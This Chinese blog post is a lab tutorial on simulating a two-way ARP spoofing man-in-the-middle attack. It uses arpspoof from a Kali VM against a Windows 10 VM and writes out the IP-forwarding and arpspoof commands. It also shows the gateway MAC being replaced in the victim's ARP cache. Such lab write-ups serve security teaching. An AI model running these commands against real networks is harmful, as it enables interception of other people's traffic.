【网络安全】基于 arpspoof 模拟ARP双向欺骗攻击
原理
ARP欺骗
ARP欺骗(ARP Spoofing)是一种网络攻击技术,攻击者通过发送伪造的ARP(地址解析协议)消息,将其MAC地址与目标IP地址关联起来,从而拦截、修改或阻止网络通信。
攻击步骤
- 攻击者发送伪造的ARP响应:攻击者向网络中的设备发送伪造的ARP响应,声称其MAC地址对应某个目标IP地址。
- 设备更新ARP缓存:接收到伪造ARP响应的设备会更新其ARP缓存,将目标IP地址与攻击者的MAC地址关联起来。
- 流量劫持:由于设备的ARP缓存被篡改,发送到目标IP地址的数据包会被发送到攻击者的设备。攻击者可以选择转发这些数据包(中间人攻击)或直接截获数据包。
测试环境
- 攻击者主机:Kali Linux 2024.3(VMware 虚拟机)
- 靶机:Windows 10(VMware 虚拟机)
模拟步骤
-
查询靶机IP及网关地址
ipconfig
- 靶机IPv4地址:192.168.122.130
- 默认网关地址:192.168.122.2
-
查询攻击者主机IP地址及MAC地址
ifconfig
eth0为网卡,inet后为IP地址。
- IP地址:192.168.122.133
- MAC地址:00:0c:29:d3:ca:99
-
在攻击前,确认靶机能够ping通百度
ping baidu.com
-
在攻击前,查询靶机网关IP地址与MAC地址
arp -a
- 网关地址:192.168.122.2
- 物理地址:00-50-56-ef-90-2c
-
攻击者主机开启 Kali Linux IP转发
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
-
攻击者发起ARP双向欺骗
sudo arpspoof -i eth0 -t 192.168.122.130 -r 192.168.122.2
-
在攻击后,查询靶机网关IP地址与MAC地址
arp -a
- 网关地址:192.168.122.2
- 物理地址:00-0c-29-d3-ca-99(即攻击者主机所对应MAC地址)
-
仍能正常ping通百度。此时攻击者主机作为中转站,对靶机和网关同时进行欺骗,对靶机伪装为网关而对网关伪装成为靶机。
ping baidu.com
参考资料
声明
本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规。
博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规,不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任。